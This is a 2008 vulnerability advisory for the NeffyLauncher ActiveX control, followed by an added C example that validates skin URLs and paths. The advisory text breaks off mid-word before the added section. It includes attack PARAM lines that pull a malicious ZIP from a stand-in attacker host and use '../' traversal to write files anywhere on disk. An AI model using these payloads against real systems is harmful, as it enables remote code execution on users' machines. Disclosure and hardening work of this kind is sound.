Title: CDNetworks Nefficient Download (NeffyLauncher.dll) Vulnerabilities
Author: Simon Ryeo (bar4mi (at) gmail.com, barami (at) ahnlab.com)
Severity: High
Impact: Remote Code Execution
Vulnerable Systems: MS Windows Systems
Version: NeffyLauncher 1.0.5 {AA07EBD2-EBDD-4BD6-9F8F-114BD513492C}
Solution: Apply the vendor’s patch
Vendor’s Homepage: http://www.cdnetworks.com
Reference: How to stop an ActiveX control from running in Internet Explorer
http://support.microsoft.com/kb/240797/ko
http://support.microsoft.com/kb/240797/en-us
History:
- 02.27.2008: Initial notification
- 03.06.2008: The vendor patched
- After: The vendor is applying the patch to its customers.

Description:
Nefficient Download is an ActiveX control used to download and upgrade
files, such as game install files, through HTTP, FTP, etc. It has two
vulnerabilities.
1st, an attacker can copy a malicious file to any path, such as the Startup
folder (C:\Documents and Settings\All Users\Start Menu\Programs\Startup).
2nd, an attacker can issue keycodes, which are used to restrict execution on
other domains.

Object:
I report this vulnerability not to promote abnormal uses but to make
software more secure. This vulnerability was patched through the vendor’s
positive effort. I hope this information helps many people who try
to study security and to develop applications.

1. Remote Code Execution
First of all, an attacker must either have write permission on a board on a
web site that uses this ActiveX control or obtain a valid keycode that is
correct for their own site.
An attacker who has a valid keycode can make an exploit by modifying the
values of HttpSkin and SkinPath. The malicious files on the attacker’s site
must be compressed as a ZIP file.
For instance, the modification below copies abnormal files to the Windows
root directory.
<PARAM NAME="HttpSkin" VALUE="http://www.attacker.com/maliciousFiles.zip">
<PARAM NAME="SkinPath" VALUE="../../../../">

In this wa
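
Added example (not part of the original advisory and not the vendor's patch):
the kind of validation a control could apply to HttpSkin and SkinPath before
downloading and extracting a skin archive. The function names, the pinned
host skins.example.com and the policy itself are assumptions.

```c
#include <stdio.h>
#include <string.h>

/* Assumed policy (not the vendor's fix): SkinPath is a relative path of
 * plain directory names, so extraction cannot leave the skin root. */
int skin_path_is_safe(const char *p)
{
    if (p == NULL || *p == '\0') return 0;
    if (*p == '/' || *p == '\\') return 0;      /* rooted or UNC path */
    if (strchr(p, ':') != NULL) return 0;       /* drive letter or stream */
    while (*p != '\0') {
        size_t n = strcspn(p, "/\\");           /* length of one component */
        /* Rejects "." and "..", and names that Win32 path normalization
         * may alias by dropping trailing dots or spaces (e.g. ".. "). */
        if (n > 0 && (p[n - 1] == '.' || p[n - 1] == ' ')) return 0;
        p += n;
        if (*p != '\0') p++;                    /* step over the separator */
    }
    return 1;
}

/* Assumed policy: HttpSkin may only name one pinned host over http(s).
 * The comparison is case-sensitive, so unexpected spellings fail closed. */
int skin_url_is_allowed(const char *url, const char *host)
{
    size_t alen, hlen;
    if (url == NULL || strchr(url, '\\') != NULL) return 0;
    if (strncmp(url, "https://", 8) == 0) url += 8;
    else if (strncmp(url, "http://", 7) == 0) url += 7;
    else return 0;
    alen = strcspn(url, "/?#");                 /* authority part */
    if (memchr(url, '@', alen) != NULL) return 0;   /* userinfo before host */
    hlen = strcspn(url, ":/?#");                /* host without port */
    return hlen == strlen(host) && strncmp(url, host, hlen) == 0;
}

int main(void)
{
    /* Values from the advisory, checked against a constructed host. */
    const char *url = "http://www.attacker.com/maliciousFiles.zip";
    const char *path = "../../../../";
    printf("HttpSkin allowed: %d\n", skin_url_is_allowed(url, "skins.example.com"));
    printf("SkinPath safe:    %d\n", skin_path_is_safe(path));
    return 0;
}
```

The same component check applies to every entry name inside the downloaded
ZIP before it is written to disk.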